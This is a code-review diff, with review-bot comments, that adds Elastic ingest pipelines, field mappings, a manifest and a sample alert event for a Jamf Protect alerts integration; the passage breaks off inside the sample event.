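Review bot: The process script in the "ECS Process Mapping" section indexes `related.binaries` without checking that the list exists or is non-empty (`def binary = ctx.jamf_protect.alerts.input.related.binaries[0];`), so a GPProcessEvent whose `related.binaries` is missing or `[]` (the sample event shows `related.files` arriving as `[]`) throws, and with no `ignore_failure` on that processor the whole document is routed to `on_failure` and tagged `pipeline_error`; guard it as `def binary = (ctx.jamf_protect.alerts.input.related.binaries != null && ctx.jamf_protect.alerts.input.related.binaries.size() > 0) ? ctx.jamf_protect.alerts.input.related.binaries[0] : null;`. The `threat.framework` and `threat.software.platforms` conditions have the same shape of problem, `...match?.facts[0].tags.contains("MITREattack")` throws instead of evaluating false when `facts` is an empty list or the first fact has no `tags`. The tags script assigns `ctx.tags = ctx.jamf_protect.alerts.input.match.facts[0].tags;`, which overwrites the agent-supplied tags, so `preserve_original_event` and `forwarded` are lost whenever a fact carries tags and the later `remove: event.original` fires even though the user asked to keep the original; append instead, e.g. `if (ctx.tags == null) { ctx.tags = new ArrayList(); } for (def t : ctx.jamf_protect.alerts.input.match.facts[0].tags) { if (!ctx.tags.contains(t)) { ctx.tags.add(t); } }`. Finally, the two `rename` processors targeting `rule.name` and `rule.description` use `ctx.`-prefixed, bracket-indexed paths that, as far as I can tell, the rename processor treats as literal field names, and `ignore_missing: true` hides that they never fire (the second also renames `.name` while its condition tests `.human`); populating `ctx.rule` from the existing `event.action`/`event.reason` scripts would be more reliable.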
@@ -0,0 +1,29 @@
+---
+description: Pipeline for processing GPUnifiedLogEvent events.
+processors:
+
+######################
+## ECS Log Mapping ##
+######################
+ - rename:
+ field: jamf_protect.alerts.input.match.event.process
+ target_field: process.name
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.process != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.processIdentifier
+ target_field: process.pid
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.processIdentifier != null
+ - date:
+ field: jamf_protect.alerts.input.match.event.timestamp
+ target_field: process.start
+ formats:
+ - UNIX
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.timestamp != null
+
+on_failure:
+- set:
+ field: event.kind
+ value: pipeline_error
+- append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
\ No newline at end of file
diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml
new file mode 100644
index 00000000000..c8cd62db537
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml
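Review bot: The `date` processor writes the unified-log `event.timestamp` into `process.start`, but that value is when the log entry was recorded, not when the named process started; the expected output earlier in this PR appears to show `process.start` identical to `event.start` for these alerts, which will mislead anyone correlating process lifetimes. Either drop the processor (the default pipeline already maps the same timestamp to `event.start`) or state in the `description` that `process.start` is only an approximation for unified-log events. Stylistically, the `eventType == "GPUnifiedLogEvent"` guard on each processor repeats the condition under which the default pipeline invokes this one and could be reduced to the `!= null` checks.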
@@ -0,0 +1,59 @@
+---
+description: Pipeline for processing GPUSBEvent events.
+processors:
+
+######################
+## ECS Volume Mapping ##
+######################
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.bsdName
+ target_field: volume.nt_name
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.bsdName != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.content
+ target_field: volume.file_system_type
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.content != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.busName
+ target_field: volume.bus_type
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.busName != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.productName
+ target_field: volume.product_name
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.productName != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.productId
+ target_field: volume.product_id
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.productId != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.isRemovable
+ target_field: volume.removable
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.isRemovable != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.serialNumber
+ target_field: volume.serial_number
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.serialNumber != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.size
+ target_field: volume.size
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.size != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.vendorId
+ target_field: volume.vendor_id
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.vendorId != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.vendorName
+ target_field: volume.vendor_name
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.vendorName != null
+ - rename:
+ field: jamf_protect.alerts.input.match.event.device.isWritable
+ target_field: volume.writable
+ if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.isWritable != null
+
+on_failure:
+- set:
+ field: event.kind
+ value: pipeline_error
+- append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
\ No newline at end of file
diff --git a/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml b/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml
new file mode 100644
index 00000000000..af87680a01f
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: event.dataset
+ type: constant_keyword
+ description: Name of the dataset.
+ value: jamf_protect.alerts
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: jamf_protect
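Review bot: Renaming the macOS `device.bsdName` (a BSD disk node name) into `volume.nt_name` is a semantic mismatch, since in ECS `volume.nt_name` is, as far as I recall, the Windows NT device object name, so a detection written against that field for Windows data will match unrelated macOS values; `volume.device_name` is the ECS field for the OS-level device name, if the ECS reference this package pins includes it, and the matching entry in `fields/ecs.yml` would change with it. Each `rename` here also re-tests `eventType == "GPUSBEvent"` although the default pipeline only invokes this pipeline under that condition, so the guards could be reduced to the `device?.<field> != null` checks; that part is purely stylistic.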
diff --git a/packages/jamf_protect/data_stream/alerts/fields/ecs.yml b/packages/jamf_protect/data_stream/alerts/fields/ecs.yml new file mode 100644 index 00000000000..48cc9ae7280 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/fields/ecs.yml 
@@ -0,0 +1,314 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: process.args +- external: ecs + name: process.args_count +- external: ecs + name: process.command_line +- external: ecs + name: process.executable +- external: ecs + name: process.parent.pid +- external: ecs + name: process.group_leader.group.id +- external: ecs + name: process.real_group.id +- external: ecs + name: process.parent.real_group.id +- external: ecs + name: process.group_leader.real_group.id +- external: ecs + name: process.entity_id +- external: ecs + name: process.real_user.id +- external: ecs + name: process.parent.real_user.id +- external: ecs + name: process.group_leader.real_user.id +- external: ecs + name: process.user.id +- external: ecs + name: process.parent.user.id +- external: ecs + name: process.group_leader.user.id +- external: ecs + name: process.tty +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.exit_code +- external: ecs + name: process.executable +- external: ecs + name: process.name +- external: ecs + name: process.pid +- external: ecs + name: process.hash.md5 +- external: ecs + name: process.hash.sha1 +- external: ecs + name: process.hash.sha256 +- external: ecs + name: 
process.code_signature.signing_id +- external: ecs + name: process.code_signature.status +- external: ecs + name: process.code_signature.team_id +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: threat.tactic.id +- external: ecs + name: threat.tactic.reference +- external: ecs + name: threat.tactic.name +- external: ecs + name: threat.technique.id +- external: ecs + name: threat.technique.name +- external: ecs + name: threat.technique.reference +- external: ecs + name: threat.enrichments +- external: ecs + name: threat.software.platforms +- external: ecs + name: container.image.tag +- external: ecs + name: container.runtime +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + 
name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.type +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.name +- external: ecs + name: process.parent.executable +- external: ecs + name: process.parent.entity_id +- external: ecs + name: process.parent.start +- external: ecs + name: process.parent.code_signature.signing_id +- external: ecs + name: process.parent.code_signature.status +- external: ecs + name: process.parent.code_signature.team_id +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.group_leader.name +- external: ecs + name: process.group_leader.executable +- external: ecs + name: process.group_leader.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: process.parent.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: 
tags +- external: ecs + name: threat.framework +- external: ecs + name: threat.technique.name +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: group.name +- name: volume.file_system_type + type: keyword +- name: volume.bus_type + type: keyword +- name: volume.nt_name + type: keyword +- name: volume.product_id + type: keyword +- name: volume.product_name + type: keyword +- name: volume.removable + type: boolean +- name: volume.serial_number + type: keyword +- name: volume.size + type: long +- name: volume.vendor_id + type: keyword +- name: volume.vendor_name + type: keyword +- name: volume.writable + type: boolean diff --git a/packages/jamf_protect/data_stream/alerts/fields/fields.yml b/packages/jamf_protect/data_stream/alerts/fields/fields.yml new file mode 100644 index 00000000000..8fbed644933 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/fields/fields.yml @@ -0,0 +1,9 @@ +- name: jamf_protect.alerts + type: group + release: beta + fields: + - name: timestamp_nanoseconds + type: date + description: > + The timestamp in Epoch nanoseconds. + diff --git a/packages/jamf_protect/data_stream/alerts/manifest.yml b/packages/jamf_protect/data_stream/alerts/manifest.yml new file mode 100644 index 00000000000..c0779da9653 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/manifest.yml 
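Review bot: A large part of this file is declared twice: starting with the second `ecs.version` entry after `container.runtime`, the entries for `error.message`, `event.action`, `event.category`, `event.created`, `event.id`, `event.ingested`, `event.kind`, `event.severity`, `event.start`, `file.hash.md5`/`sha1`/`sha256`, `file.name`, `file.path`, `process.command_line`, `process.parent.pid`, `process.pid`, `process.group_leader.pid`, `related.hash`/`hosts`/`ip`/`user`, `tags`, `threat.technique.name`, `user.domain` and `user.name` repeat earlier ones, and `process.executable` and `process.parent.start` each appear twice within a single block; dedupe so the mapping source is unambiguous. Conversely I cannot find declarations for fields the default pipeline writes: `event.reason`, `host.hostname`, `host.id`, `host.ip`, `host.os.family` and `host.os.full` (the expected output at the top of this chunk shows them populated); if they are not supplied by a package-level fields file outside this diff, add `- external: ecs` entries for them. The `volume.*` fields are declared as bare keyword/boolean/long instead of `external: ecs`, which drops the ECS descriptions; a one-line comment such as `# volume.* declared locally: not in the ECS reference pinned by this package` would tell the next maintainer whether that is deliberate.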
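Review bot: `jamf_protect.alerts.timestamp_nanoseconds` is declared here, but none of the pipelines in this diff populate it, and the default pipeline's cleanup removes `jamf_protect.alerts` and `jamf_protect` unconditionally, so as far as this commit shows the field can never appear in an indexed document. Either populate it before that `remove` runs or drop the declaration; if it is kept, a `description` that says which source value feeds it would help.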
@@ -0,0 +1,57 @@
+title: Receives Alerts from Jamf Protect with Elastic Agent.
+type: logs
+streams:
+ - input: http_endpoint
+ template_path: http_endpoint.yml.hbs
+ title: Jamf Protect Alerts
+ description: Receives Alerts from Jamf Protect with Elastic Agent.
+ vars:
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The port number the listener binds to.
+ multi: false
+ required: true
+ show_user: true
+ default: 9551
+ - name: url
+ type: text
+ title: URL
+ description: This option specifies which URL path to accept requests on. Defaults to /.
+ multi: false
+ required: false
+ show_user: false
+ default: /
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - jamf_protect-alerts
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: true
+ title: Preserve duplicate custom fields
+ description: Preserve custom fields for all ECS mappings.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/jamf_protect/data_stream/alerts/sample_event.json b/packages/jamf_protect/data_stream/alerts/sample_event.json
new file mode 100644
index 00000000000..3f3467b0414
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/sample_event.json
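Review bot: `preserve_duplicate_custom_fields` is declared here and the template adds the matching tag, but the default pipeline's cleanup `remove` drops `jamf_protect.alerts` and `jamf_protect` with no condition, so the toggle has no effect and users who enable it will not get what the description promises. Either gate that `remove` the same way `event.original` is gated, `if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))`, or remove the var until the pipeline honours it. Separately, `listen_port` is the only listener setting exposed, so an operator cannot bind the endpoint to a specific address from the policy UI; see the note on the `http_endpoint.yml.hbs` hunk.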
@@ -0,0 +1,133 @@
+{
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "event": {
+ "action": "User Elevated Action",
+ "category": [
+ "host",
+ "process"
+ ],
+ "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4",
+ "kind": "alert",
+ "module": "jamf_protect",
+ "outcome": "success",
+ "provider": "Jamf Protect",
+ "reason": "Application used deprecated elevation API",
+ "severity": 0,
+ "start": "2023-11-01T12:20:38.851Z",
+ "type": [
+ "start"
+ ]
+ },
+ "group": {
+ "id": "0",
+ "name": "wheel"
+ },
+ "host": {
+ "hostname": "VMAC-2C23RW4DY",
+ "id": "0000FE00-8406CE28ECFC4DAB",
+ "ip": [
+ "192.168.11.226"
+ ],
+ "os": {
+ "family": "macos",
+ "full": "Version 14.0 (Build 23A344)"
+ }
+ },
+ "message": "{\"caid\":\"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7\",\"certid\":\"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea\",\"input\":{\"host\":{\"os\":\"Version 14.0 (Build 23A344)\",\"ips\":[\"192.168.11.226\"],\"serial\":\"Z2C23RW4DY\",\"hostname\":\"VMAC-2C23RW4DY\",\"protectVersion\":\"5.1.0.4\",\"provisioningUDID\":\"0000FE00-8406CE28ECFC4DAB\"},\"match\":{\"tags\":[\"MITREattack\",\"DefenseEvasion\",\"T1548.004\",\"AbuseElevationControlMechanism\",\"PrivilegeEscalation\"],\"uuid\":\"7232d4a4-2289-49ba-a218-215ef3d62ec4\",\"event\":{\"pid\":3136,\"type\":1,\"uuid\":\"e19385fc-6077-4d00-ad56-b89eec15e730\",\"subType\":7,\"timestamp\":1698841238.851668},\"facts\":[{\"name\":\"User Elevated Action\",\"tags\":[\"DefenseEvasion\",\"T1548.004\",\"PrivilegeEscalation\",\"MITREattack\",\"AbuseElevationControlMechanism\"],\"uuid\":\"db094865-99c2-416c-9f06-e7740d9e8a20\",\"human\":\"Application used deprecated elevation API\",\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"version\":1,\"severity\":0}],\"custom\":false,\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"severity\":0},\"related\":{\"files\":[],\"users\":[{\"uid\":0,\"name\":\"root\",\"uuid\":\"Z2C23RW4DY0\"},{\"uid\":501,\"name\":\"local-admin\",\"uuid\":\"Z2C23RW4DY1f5\"}],\"groups\":[{\"gid\":0,\"name\":\"wheel\",\"uuid\":\"Z2C23RW4DY0\"},{\"gid\":20,\"name\":\"staff\",\"uuid\":\"Z2C23RW4DY14\"}],\"binaries\":[{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35273,\"path\":\"/usr/libexec/security_authtrampoline\",\"size\":134768,\"inode\":1152921500312504800,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"82e899cb1c8a42b74653b05ca526d5feae92b9f6\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"size\":6929392,\"inode\":4631313,\"xattrs\":[],\"changed\":1698101729,\"created\":1697718684,\"sha1hex\":\"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3\",\"accessed\":1698818094,\"modified\":1697718684,\"sha256hex\":\"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35145,\"path\":\"/usr/bin/sudo\",\"size\":1446192,\"inode\":1152921500312502700,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"8e860430a91946640dcc5161c726a39dc8576cc3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33133,\"path\":\"/bin/bash\",\"size\":1310224,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/bin/zsh\",\"size\":1377584,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"959ade1e4967a51eb8757d723d5040090fdfcb5c\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35181,\"path\":\"/usr/bin/login\",\"size\":172032,\"inode\":1152921500312502100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"875c999ee4df1a16d7654636714f852f55d1cc57\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"size\":2222656,\"inode\":1152921500311913100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"14c2df1ea5a91fed7527fcfdff74268e19524eb3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false}],\"processes\":[{\"gid\":0,\"pid\":3136,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/usr/libexec/security_authtrampoline\",\"/Library/Application Support/JAMF/Remote Assist/Wipe\",\"auth 16\"],\"name\":\"security_authtrampoline\",\"path\":\"/usr/libexec/security_authtrampoline\",\"pgid\":3096,\"ppid\":3099,\"rgid\":0,\"ruid\":0,\"uuid\":\"c821d617-2ce5-4475-aae6-c428a1ad9e8c\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841238,\"originalParentPID\":3099,\"processIdentifier\":6750},{\"gid\":0,\"pid\":3099,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"jamfRemoteAssistLauncher\",\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"pgid\":3096,\"ppid\":3098,\"rgid\":0,\"ruid\":0,\"uuid\":\"a382cfda-8964-4388-8c19-49d4eaef2ae7\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841236,\"originalParentPID\":3098,\"processIdentifier\":6654},{\"gid\":20,\"pid\":3098,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"sudo\",\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"sudo\",\"path\":\"/usr/bin/sudo\",\"pgid\":3096,\"ppid\":3096,\"rgid\":20,\"ruid\":501,\"uuid\":\"31060be9-a210-4e18-bec5-2b0b6c482563\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841234,\"originalParentPID\":3096,\"processIdentifier\":6652},{\"gid\":20,\"pid\":3096,\"tty\":\"/dev/ttys016\",\"uid\":501,\"args\":[\"/bin/sh\",\"/Library/Application Support/JAMF/Remote 